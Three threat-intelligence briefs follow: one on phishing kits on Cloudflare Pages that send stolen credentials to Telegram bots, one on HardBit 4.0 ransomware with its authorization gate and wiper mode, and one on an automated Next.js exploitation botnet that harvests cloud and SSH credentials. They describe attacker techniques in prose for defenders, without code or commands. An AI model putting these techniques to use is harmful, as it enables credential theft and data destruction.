Phishers Exploit Cloudflare Pages and Telegram to Scale Credential Theft
Threat actors are increasingly abusing free developer hosting platforms, most notably Cloudflare Pages, to host highly convincing phishing portals that impersonate banking, insurance, and healthcare providers. These campaigns frequently leverage compromised legitimate websites as redirectors, allowing phishing links to originate from trusted domains before silently forwarding victims to attacker-controlled *.pages[.]dev subdomains. The phishing kits closely replicate real login workflows, intentionally triggering failed login states to prompt victims for additional information such as security question answers, backup verification data, and other recovery details that can be used to bypass multi-factor authentication and account protection controls. Rather than exfiltrating stolen data to traditional command-and-control infrastructure, the kits transmit captured credentials directly to Telegram bots using hardcoded tokens and chat IDs embedded in client-side JavaScript. This provides attackers with real-time access to harvested data, enables rapid infrastructure rotation, and reduces exposure to domain- and IP-based blocking controls. The use of Telegram also lowers operational overhead by eliminating the need to maintain dedicated backend servers while blending malicious traffic with legitimate messaging activity. The combination of free cloud hosting, compromised redirectors, and Telegram-based exfiltration significantly increases campaign resilience and operational speed, highlighting a broader shift toward abusing mainstream platforms to evade detection and takedown efforts while scaling credential theft operations. Organizations should treat authentication pages hosted on generic developer platforms as inherently untrusted, strengthen email security controls to detect multi-stage redirects involving compromised legitimate domains, and monitor for browser-based exfiltration to messaging platforms such as Telegram. Enforcing phishing-resistant MFA, limiting reliance on static security questions, and educating users to avoid logging in through unsolicited links can significantly reduce the effectiveness of these campaigns even when the infrastructure appears legitimate.
HardBit 4.0: An Authorization-Gated Ransomware Focused on Stealth, Persistence, and Destructive Impact
HardBit is a ransomware strain active since 2022 that differentiates itself from many contemporary ransomware operations by not operating a public data leak site, instead focusing exclusively on encryption and optional destruction of victim data. The latest iteration, HardBit 4.0, represents a clear maturation of the malware, introducing stronger obfuscation, operational safeguards, and execution controls designed to limit analysis and misuse. Most notably, HardBit 4.0 leverages the long-standing Neshta file-infector malware as a dropper, allowing the ransomware payload to be decrypted and launched in a manner that blends into normal executable behavior while also establishing persistence through registry modification. Operationally, HardBit 4.0 is built for flexibility and control. The malware is distributed in both command-line and graphical variants, suggesting use by operators with varying skill levels, and introduces a runtime authorization model that requires a decoded authorization ID and encryption key before execution. This mechanism significantly complicates sandboxing and automated analysis, as the ransomware will not run without operator-supplied inputs. In addition to standard encryption functionality, the GUI version includes a configurable “Wiper” mode that permanently destroys data instead of encrypting it, indicating an intent to support destructive operations where ransom recovery is not the primary objective. Combined with aggressive disabling of Windows Defender protections, credential harvesting for lateral movement, and systematic removal of recovery options, HardBit 4.0 is positioned as a controlled, high-impact ransomware tool optimized for stealth, operator control, and maximum disruption. To reduce exposure to HardBit-style ransomware, organizations should prioritize restricting external access to RDP and SMB services, enforcing strong authentication, and monitoring for brute-force activity and anomalous lateral movement.
Update: Industrial-Scale Exploitation of Next.js Infrastructure and Automated Credential Exfiltration
Monitoring an exposed Docker honeypot revealed an active, highly automated exploitation campaign targeting publicly accessible Next.js and React-based applications at scale. The activity is attributed to a threat actor identifying as “PCP,” based on consistent file signatures, embedded strings, and recurring infrastructure patterns observed across multiple compromised hosts. The campaign leverages chained remote code execution vulnerabilities, specifically CVE-2025-29927, to gain unauthenticated command execution on vulnerable servers. Once access is established, the malware systematically enumerates sensitive assets, including environment configuration files, cloud credentials, SSH private keys, Docker authentication tokens, and Git credentials. The exploitation process is fully automated and designed to rapidly validate targets before escalating to deeper system compromise. This operational model allows the actor to transition from reconnaissance to credential exfiltration and persistence with minimal dwell time and little need for manual oversight. Following successful exploitation, compromised systems are converted into durable infrastructure nodes by deploying SOCKS proxies, reverse tunnels, and multiple system services that ensure persistence across reboots and failures. Direct reconnaissance of the live command-and-control environment confirmed 59,128 successful server compromises in under 48 hours, reflecting a 64.6% exploitation success rate across more than 91,000 scanned targets. The exposed C2 APIs lack authentication or validation controls, enabling unrestricted task distribution, telemetry collection, and large-scale ingestion of stolen credentials. This design supports continuous scanning and reinfection cycles, allowing the botnet to expand rapidly while maintaining centralized control over compromised assets. At its current operational tempo, the campaign presents a critical risk to cloud infrastructure, CI/CD environments, and software supply chains that rely on exposed application runtimes. Organizations should prioritize immediate patching of affected frameworks, rotate all potentially exposed credentials, block known C2 infrastructure, hunt for unauthorized persistence mechanisms, and implement continuous monitoring to reduce attack surface and prevent reinfection by similar automated exploitation campaigns.
